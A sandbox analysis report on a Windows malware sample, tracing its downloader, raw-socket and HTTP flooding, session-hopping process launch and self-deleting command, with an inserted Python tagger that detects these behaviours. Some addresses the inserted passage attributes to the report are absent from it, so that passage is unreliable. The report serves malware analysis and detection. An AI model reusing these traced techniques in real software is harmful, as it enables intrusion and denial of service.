• Opcode ID: efbbc9d8af3d7b455d687a6dc9a5cb571a86f4244b6b6a272ae7ca2361ab11e2
• Instruction ID: 08f138826c2742ad1e90fd7b24ce07064196e1c4affbd45f6d1256da74b3e464
• Opcode Fuzzy Hash: efbbc9d8af3d7b455d687a6dc9a5cb571a86f4244b6b6a272ae7ca2361ab11e2
• Instruction Fuzzy Hash: 3171757280422DABEB14EBB1CC88BEE7778FF05344F5405AAE105E3192DB749A89CF55
APIs
• LoadLibraryA.KERNEL32(wininet.dll), ref: 100059C6
• GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100059DD
• GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 100059F7
• FreeLibrary.KERNEL32(00000000), ref: 10005A15
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10005A30
• memset.MSVCRT ref: 10005A4C
• GetProcAddress.KERNEL32(?,InternetReadFile), ref: 10005A5C
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10005A94
• CloseHandle.KERNEL32(?), ref: 10005AA7
• Sleep.KERNEL32(00000001), ref: 10005AB2
• GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10005ABE
• FreeLibrary.KERNEL32(00000000), ref: 10005AD1
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
• String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
• API String ID: 2364563185-3604101231
• Opcode ID: 05eef36300ddf8c3d82d9737e99534f37842e2198b646f4bdb7f3bacb91e066a
• Instruction ID: 03bf95695c500382511aba501602f444d8238b7f92771174b141d83944f77373
• Opcode Fuzzy Hash: 05eef36300ddf8c3d82d9737e99534f37842e2198b646f4bdb7f3bacb91e066a
• Instruction Fuzzy Hash: 7D3137B1D0021DBEEB119FA0CCC4EEFBFB8EB462D5F104169F605A2155D7324E95CAA1
APIs
• LoadLibraryA.KERNEL32(userenv.dll), ref: 10008F6E
• GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10008F7F
• memset.MSVCRT ref: 10008F99
• memset.MSVCRT ref: 10008FA5
• GetCurrentProcess.KERNEL32 ref: 10008FC7
• OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 10008FD7
• DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 10008FEE
• LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 10008FFE
• GetProcAddress.KERNEL32(00000000), ref: 10009001
• SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10009017
• CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 10009043
• CloseHandle.KERNEL32(?), ref: 10009055
• CloseHandle.KERNEL32(?), ref: 1000905A
• FreeLibrary.KERNEL32(?), ref: 10009068
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: LibraryProcessToken$AddressCloseHandleLoadProcmemset$CreateCurrentDuplicateFreeInformationOpenUser
• String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$userenv.dll
• API String ID: 2806168956-609967149
• Opcode ID: 0614323540c7b0779648bb837dc67b9d6396a1a74a4de50b86f9cfedfc4c9ffe
• Instruction ID: b0061dd1da551715a04a27dc39b510c82f790e22057ebd98344087f86a6c2854
• Opcode Fuzzy Hash: 0614323540c7b0779648bb837dc67b9d6396a1a74a4de50b86f9cfedfc4c9ffe
• Instruction Fuzzy Hash: E331B2B1D0122DBAEB10EBE5CC89EDEBFBCEF09790F104056F205A6154D7B19A54DBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Window$lstrlenstrcatstrcpy$??2@ClassFindNameTextmemsetstrcmpstrlen
• String ID: -/-$CTXOPConntion_Class$_
• API String ID: 3465381727-591102176
• Opcode ID: 98112882db2913dc7719aee8fa0170be0b3162692d403c660481b053825a94fd
• Instruction ID: 579be03eab104266c88bfc42165da39d9121a5dd043f8af95e569b38c51c2b6b
• Opcode Fuzzy Hash: 98112882db2913dc7719aee8fa0170be0b3162692d403c660481b053825a94fd
• Instruction Fuzzy Hash: 07319DB690425DBEFB14DBA4DC45FDE7BB9EB05380F2081A6E204A5095DBB0AE808F54
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 100092C8
• GetShortPathNameA.KERNEL32(?,?,00000104), ref: 100092DD
• GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 100092F0
• lstrcatA.KERNEL32(?,/c del ), ref: 10009308
• lstrcatA.KERNEL32(?,?), ref: 10009318
• lstrcatA.KERNEL32(?, > nul), ref: 10009326
• ShellExecuteExA.SHELL32(?), ref: 1000935B
• SetPriorityClass.KERNEL32(00000000,00000040), ref: 1000936F
• GetCurrentProcess.KERNEL32(00000100), ref: 10009376
• SetPriorityClass.KERNEL32(00000000), ref: 1000937D
• GetCurrentThread.KERNEL32 ref: 10009381
• SetThreadPriority.KERNEL32(00000000), ref: 10009388
• SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 1000939A
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Prioritylstrcat$ClassCurrentNameThread$ChangeEnvironmentExecuteFileModuleNotifyPathProcessShellShortVariable
• String ID: > nul$/c del $<$COMSPEC
• API String ID: 2091984646-3769844948
• Opcode ID: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
• Instruction ID: 7e0a92b81a70da4fb670468960660760b49f9f4c910edea2561a5ad9ce3330b6
• Opcode Fuzzy Hash: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
• Instruction Fuzzy Hash: 0531DDB290022DBFEB11DBA5DC88FDEBBBCEB08750F0004A6E709E6154DA705A44CF61
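Taken together, the records above each describe one behaviour: 0040A227 creates a SOCK_RAW socket; 00410C70 calls CreateMutexA, checks GetLastError and reaches exit (the report attributes the string Rsjshd fzfgkqcm to that function), the classic single-instance guard; 100059C6 resolves InternetOpenUrlA and InternetReadFile by hand and writes the response into a CreateFileA(GENERIC_WRITE, CREATE_ALWAYS) file; 10008F6E duplicates its own token, sets TokenSessionId (class 0000000C) to the value WTSGetActiveConsoleSessionId returns and calls CreateProcessAsUserA, which is how a session-0 service lands a process on the interactive desktop; 100092C8 builds "COMSPEC /c del <own short path> > nul" and hands it to ShellExecuteExA to remove itself. Added example, not code from the report or the sample: a Python tagger that reads per-function call lists in the shape the report prints them and names those five behaviours, plus a replay of the lstrcatA sequence that recovers the self-delete command line. The Call lists are transcribed from the records above; the constant names are the Windows SDK ones; the space inserted between %COMSPEC% and "/c del " is an assumption, since the report shows that fragment without a leading space.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

# Added example. Windows SDK constants needed to read the arguments the report prints.
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 0x2
SOCK_RAW = 0x3
TOKEN_SESSION_ID = 0xC  # TOKEN_INFORMATION_CLASS value passed to SetTokenInformation


@dataclass
class Call:
    api: str
    args: list  # int for hex literals, str for string literals, None for '?'


def _apis(calls: List[Call]) -> List[str]:
    return [c.api for c in calls]


def _strings(calls: List[Call]) -> set:
    return {a for c in calls for a in c.args if isinstance(a, str)}


def tag_raw_socket(calls):
    """socket/WSASocketA with type SOCK_RAW: the caller supplies its own IP headers."""
    return any(c.api in ("socket", "WSASocketA", "WSASocketW") and len(c.args) > 1
               and c.args[1] == SOCK_RAW for c in calls)


def tag_single_instance_mutex(calls):
    """CreateMutexA followed within two calls by GetLastError, with exit in the same function."""
    apis = _apis(calls)
    if "CreateMutexA" not in apis or "exit" not in apis:
        return False
    i = apis.index("CreateMutexA")
    return "GetLastError" in apis[i + 1:i + 3]


def tag_wininet_download_to_file(calls):
    """Hand-resolved InternetOpenUrlA/InternetReadFile plus a freshly created file that is written."""
    if not {"InternetOpenUrlA", "InternetReadFile"} <= _strings(calls):
        return False
    opens_for_write = any(c.api == "CreateFileA" and len(c.args) >= 5
                          and isinstance(c.args[1], int) and c.args[1] & GENERIC_WRITE
                          and c.args[4] == CREATE_ALWAYS for c in calls)
    return opens_for_write and "WriteFile" in _apis(calls)


def tag_session_hop(calls):
    """Token re-targeted to the console session, then CreateProcessAsUserA (service to desktop)."""
    sets_session = any(c.api == "SetTokenInformation" and len(c.args) > 1
                       and c.args[1] == TOKEN_SESSION_ID for c in calls)
    return (sets_session and "CreateProcessAsUserA" in _apis(calls)
            and "WTSGetActiveConsoleSessionId" in _strings(calls))


def tag_self_delete(calls):
    """COMSPEC plus a '/c del' fragment handed to a process launcher."""
    s = _strings(calls)
    launchers = {"ShellExecuteExA", "ShellExecuteA", "CreateProcessA", "WinExec"}
    return "COMSPEC" in s and any("/c del" in a for a in s) and bool(launchers & set(_apis(calls)))


def reconstruct_self_delete_cmd(calls, self_path="<self_short_path>"):
    """Replay the lstrcatA sequence; the unresolved '?' fragment is the module's own short path."""
    parts = [self_path if c.args[1] is None else c.args[1]
             for c in calls if c.api == "lstrcatA" and len(c.args) > 1]
    if parts and not parts[0].startswith(" "):
        parts[0] = " " + parts[0]  # assumption: the report trimmed the leading space of "/c del "
    return "%COMSPEC%" + "".join(parts)


TAGGERS: Dict[str, Callable[[List[Call]], bool]] = {
    "raw_socket": tag_raw_socket,
    "single_instance_mutex": tag_single_instance_mutex,
    "wininet_download_to_file": tag_wininet_download_to_file,
    "session_hop": tag_session_hop,
    "self_delete": tag_self_delete,
}


def tag_function(calls: List[Call]) -> List[str]:
    return [name for name, fn in TAGGERS.items() if fn(calls)]


# Call lists transcribed from the report's APIs sections above (constructed input, not captured live).
RAW_SOCKET_0040A227 = [Call("WSASocketA", [2, 3, 0xFF, 0, 0, 1]), Call("inet_addr", ["192.168.1.224"]),
                       Call("htonl", [1]), Call("wsprintfA", [])]
MUTEX_00410C2B = [Call("__EH_prolog", []), Call("wsprintfA", []), Call("CreateMutexA", [0, 0, None]),
                  Call("GetLastError", []), Call("ReleaseMutex", [0]), Call("CloseHandle", [0]), Call("exit", [])]
DOWNLOADER_100059C6 = [Call("LoadLibraryA", ["wininet.dll"]), Call("GetProcAddress", [0, "InternetOpenA"]),
                       Call("GetProcAddress", [0, "InternetOpenUrlA"]), Call("FreeLibrary", [0]),
                       Call("CreateFileA", [None, 0x40000000, 0, 0, 2, 0, 0]), Call("memset", []),
                       Call("GetProcAddress", [None, "InternetReadFile"]), Call("WriteFile", [None, None, None, None, 0]),
                       Call("CloseHandle", [None]), Call("Sleep", [1]),
                       Call("GetProcAddress", [0, "InternetCloseHandle"]), Call("FreeLibrary", [0])]
SESSION_HOP_10008F6E = [Call("LoadLibraryA", ["userenv.dll"]), Call("GetProcAddress", [0, "CreateEnvironmentBlock"]),
                        Call("GetCurrentProcess", []), Call("OpenProcessToken", [0, 0xF01FF, None]),
                        Call("DuplicateTokenEx", [None, 0x2000000, 0, 1, 1, None]),
                        Call("LoadLibraryA", ["Kernel32.dll", "WTSGetActiveConsoleSessionId"]),
                        Call("GetProcAddress", [0]), Call("SetTokenInformation", [None, 0xC, None, 4]),
                        Call("CreateProcessAsUserA", [None, 0, None, 0, 0, 0, 0x430, None, 0, 0x44, None]),
                        Call("CloseHandle", [None]), Call("CloseHandle", [None]), Call("FreeLibrary", [None])]
SELF_DELETE_100092C8 = [Call("GetModuleFileNameA", [0, None, 0x104, 0, None, 0]),
                        Call("GetShortPathNameA", [None, None, 0x104]),
                        Call("GetEnvironmentVariableA", ["COMSPEC", None, 0x104]),
                        Call("lstrcatA", [None, "/c del "]), Call("lstrcatA", [None, None]),
                        Call("lstrcatA", [None, " > nul"]), Call("ShellExecuteExA", [None]),
                        Call("SetPriorityClass", [0, 0x40]), Call("SHChangeNotify", [4, 1, None, 0])]

if __name__ == "__main__":
    for name, calls in [("0040A227", RAW_SOCKET_0040A227), ("00410C2B", MUTEX_00410C2B),
                        ("100059C6", DOWNLOADER_100059C6), ("10008F6E", SESSION_HOP_10008F6E),
                        ("100092C8", SELF_DELETE_100092C8)]:
        print(name, tag_function(calls))
    print(reconstruct_self_delete_cmd(SELF_DELETE_100092C8))
```

Two of the literals in the session-hop record are worth reading as well, although the tagger does not need them: 000F01FF on OpenProcessToken is TOKEN_ALL_ACCESS, and 00000430 on CreateProcessAsUserA is CREATE_NEW_CONSOLE | NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT, both consistent with a service relaunching a copy of itself in the logged-on user's session.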
APIs
• __EH_prolog.LIBCMT ref: 100085FD
• #540.MFC42 ref: 10008611
• memset.MSVCRT ref: 10008629
• #860.MFC42(?), ref: 10008637
• #940.MFC42(0000005C,?), ref: 10008641
• #941.MFC42(?,0000005C,?), ref: 1000864C
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,?,0000005C,?), ref: 10008664
• GetFileSize.KERNEL32(00000000,00000000), ref: 10008675
• SetFilePointer.KERNEL32(?,00000040,00000000,00000000), ref: 10008687
• WriteFile.KERNEL32(?,?,00002710,?,00000000), ref: 100086A5
• LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100086BB
• GetProcAddress.KERNEL32(00000000), ref: 100086C2
• Sleep.KERNEL32(00000000), ref: 100086CB
• CloseHandle.KERNEL32(?), ref: 100086E6
• #800.MFC42 ref: 100086F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: File$#540#800#860#940#941AddressCloseCreateH_prologHandleLibraryLoadPointerProcSizeSleepWritememset
• String ID: KERNEL32.dll$WriteFile
• API String ID: 4292767242-2763452465
• Opcode ID: c6d7e4729b80686712db6ab09dfadce1623d7a439faba33a829cac5ccf9c4d80
• Instruction ID: 393a3d5d2be8bd695f1223733ce34e32a12bfa1e12c1a26939b3b7ae3726d39e
• Opcode Fuzzy Hash: c6d7e4729b80686712db6ab09dfadce1623d7a439faba33a829cac5ccf9c4d80
• Instruction Fuzzy Hash: D13129B2900119BFFB11DFA4DC99EAE7B6DFB053D4F004125F615A6195CA31AE44CB60
APIs
• _mbscpy.MSVCRT(?,10014E04), ref: 0040B9A5
• strlen.MSVCRT ref: 0040B9C8
• memset.MSVCRT ref: 0040B9F6
• strncpy.MSVCRT ref: 0040BA12
• memset.MSVCRT ref: 0040BA30
• _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 0040BA3D
• strlen.MSVCRT ref: 0040BA4C
• _mbscpy.MSVCRT(?,10012118), ref: 0040BA5F
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040BAFB
• TerminateProcess.KERNEL32(?,00000000), ref: 0040BB16
  • Part of subcall function 0040A0CC: GetTickCount.KERNEL32 ref: 0040A0CD
  • Part of subcall function 0040A0CC: rand.MSVCRT ref: 0040A0D5
• strlen.MSVCRT ref: 0040BBC7
• send.WS2_32(00000000,?,00000001,00000000), ref: 0040BBD7
• closesocket.WS2_32(00000000), ref: 0040BBDE
• RtlExitUserThread.NTDLL(00000000), ref: 0040BBEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpystrlen$Processmemset$CountCreateExitTerminateThreadTickUserclosesocketrandsendstrncpy
                                                                    • String ID: D$http://
                                                                    • API String ID: 2760872628-3355305149
                                                                    APIs
                                                                    • memset.MSVCRT ref: 100054EB
                                                                    • strlen.MSVCRT ref: 10005532
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10005560
                                                                    • memset.MSVCRT ref: 10005598
                                                                    • wsprintfA.USER32 ref: 100055B0
                                                                    • memset.MSVCRT ref: 100055BF
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 10005615
                                                                    • strstr.MSVCRT ref: 1000562D
                                                                    • strstr.MSVCRT ref: 10005641
                                                                    • lstrcatA.KERNEL32(?,10012C44), ref: 1000565B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005667
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 1000566F
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 100056B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcatlstrcpystrstr$CreateEnvironmentExpandProcessStringsstrlenwsprintf
                                                                    • String ID: "%1$%s\shell\open\command$D
                                                                    • API String ID: 1939072112-1634606264
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10004571
                                                                      • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
                                                                      • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
                                                                    • htons.WS2_32(00000000), ref: 10004599
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 100045AA
                                                                    • wsprintfA.USER32 ref: 1000461C
                                                                    • htons.WS2_32(0000041C), ref: 1000462E
                                                                    • inet_addr.WS2_32(00000000), ref: 1000464E
                                                                    • htons.WS2_32(00000001), ref: 10004673
                                                                    • htons.WS2_32(00000000), ref: 10004680
                                                                    • htons.WS2_32(00000408), ref: 1000468B
                                                                    • memcpy.MSVCRT(?,00000045,00000014), ref: 100046A3
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014), ref: 100046B5
                                                                    • sendto.WS2_32(?,?,0000041C,00000000,00000002,00000010), ref: 100046E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$inet_addrmemcpy$Socketgethostbynamememsetsendtowsprintf
                                                                    • String ID: %d.%d.%d.%d$E
                                                                    • API String ID: 3009681688-1172408257
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$_mbscat_mbscpylstrlen$??2@ClassFindNameTextmemsetstrcmpstrlen
                                                                    • String ID: CTXOPConntion_Class$_
                                                                    • API String ID: 3415961436-426622195
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$strlen$CountExitStartupThreadTickUserclosesocketconnecthtonsinet_addrmallocrandrecvsendsocket
                                                                    • String ID:
                                                                    • API String ID: 1526783793-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040B697
                                                                    • _mbscpy.MSVCRT(?,10014E04), ref: 0040B6F8
                                                                    • memcpy.MSVCRT(00000000,?,00000008), ref: 0040B743
                                                                    • memcpy.MSVCRT(?,00000011,00000001,00000000,?,00000008), ref: 0040B758
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B76D
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B782
                                                                    • memcpy.MSVCRT(?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 0040B797
                                                                    • memcpy.MSVCRT(?,?,0000000B,?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000), ref: 0040B7AC
                                                                    • sendto.WS2_32(?,00000045,00000033,00000000,00000002,00000010), ref: 0040B7DF
                                                                    • WSACleanup.WS2_32 ref: 0040B81A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$Cleanup_mbscpymemsetsendto
                                                                    • String ID: E$aaa${${
                                                                    • API String ID: 2418375239-79695315
APIs
• memset.MSVCRT ref: 100047DE
• htons.WS2_32(00000000), ref: 100047F3
  • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
  • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
• wsprintfA.USER32 ref: 1000481E
• strlen.MSVCRT ref: 1000482B
• socket.WS2_32(00000002,00000001,00000006), ref: 10004852
• connect.WS2_32(00000000,00000002,00000010), ref: 10004861
• setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 10004879
• setsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 10004890
• send.WS2_32(00000000,?,?,00000000), ref: 100048A6
• Sleep.KERNEL32(00000001), ref: 100048AD
• closesocket.WS2_32(00000000), ref: 100048B9
• Sleep.KERNEL32(0000001E), ref: 100048C1
• closesocket.WS2_32(?), ref: 100048DB
• ExitThread.KERNEL32 ref: 100048E3
Strings
• GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 10004818
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Sleepclosesocketsetsockopt$ExitThreadconnectgethostbynamehtonsinet_addrmemsetsendsocketstrlenwsprintf
• String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
APIs
• memset.MSVCRT ref: 0040D0B1
• memcpy.MSVCRT(10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0BA
• ??2@YAPAXI@Z.MSVCRT(-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0EB
• memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 0040D0F9
  • Part of subcall function 0040EABD: GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB19
  • Part of subcall function 0040EABD: RtlAllocateHeap.NTDLL(00000000), ref: 0040EB20
  • Part of subcall function 0040EABD: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,0040CF2E,?), ref: 0040EB64
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00000001), ref: 0040D139
  • Part of subcall function 0040EFB3: FreeLibrary.KERNEL32(?,00000000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040EFEF
  • Part of subcall function 0040EFB3: free.MSVCRT ref: 0040EFFE
  • Part of subcall function 0040EFB3: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F014
  • Part of subcall function 0040EFB3: GetProcessHeap.KERNEL32(00000000,?,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F01C
  • Part of subcall function 0040EFB3: HeapFree.KERNEL32(00000000,?,?,?,0040CF2E,?), ref: 0040F023
Strings
Memory Dump Source
• Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: Heap$Freememcpy$Process$??2@??3@AllocateLibraryVirtualfreememset
• String ID: O$P$Proxy$e$n$o$p$r$x$y
APIs
• memset.MSVCRT ref: 10005065
• memcpy.MSVCRT(10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 1000506E
• ??2@YAPAXI@Z.MSVCRT(-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 1000509F
• memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10015114,00000000,00000063,10015114,00000000,00000063,00000001), ref: 100050AD
  • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(00000004,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AAC
  • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006ABC
  • Part of subcall function 10006A71: GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,10004EE2,?), ref: 10006ACD
  • Part of subcall function 10006A71: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,10004EE2,?), ref: 10006AD4
  • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AF8
  • Part of subcall function 10006A71: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006B07
  • Part of subcall function 10006A71: memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,10004EE2,?), ref: 10006B18
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,00000001), ref: 100050ED
  • Part of subcall function 10006F67: FreeLibrary.KERNEL32(?,00000000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FA3
  • Part of subcall function 10006F67: free.MSVCRT ref: 10006FB2
  • Part of subcall function 10006F67: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FC8
  • Part of subcall function 10006F67: GetProcessHeap.KERNEL32(00000000,?,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FD0
  • Part of subcall function 10006F67: HeapFree.KERNEL32(00000000,?,?,?,10004EE2,?), ref: 10006FD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$Heap$Freememcpy$Process$??2@??3@Libraryfreememset
• String ID: O$P$Proxy$e$n$o$p$r$x$y
APIs
• LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000A0DF
• GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 1000A0F2
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1000A0FD
• GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 1000A108
• GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A116
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 1000A120
• GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 1000A12B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
APIs
  • Part of subcall function 1000A44E: LoadLibraryA.KERNEL32(10009826,?,?,75A78400,00000000), ref: 1000A4F7
  • Part of subcall function 1000A44E: GetProcAddress.KERNEL32(00000000), ref: 1000A4FE
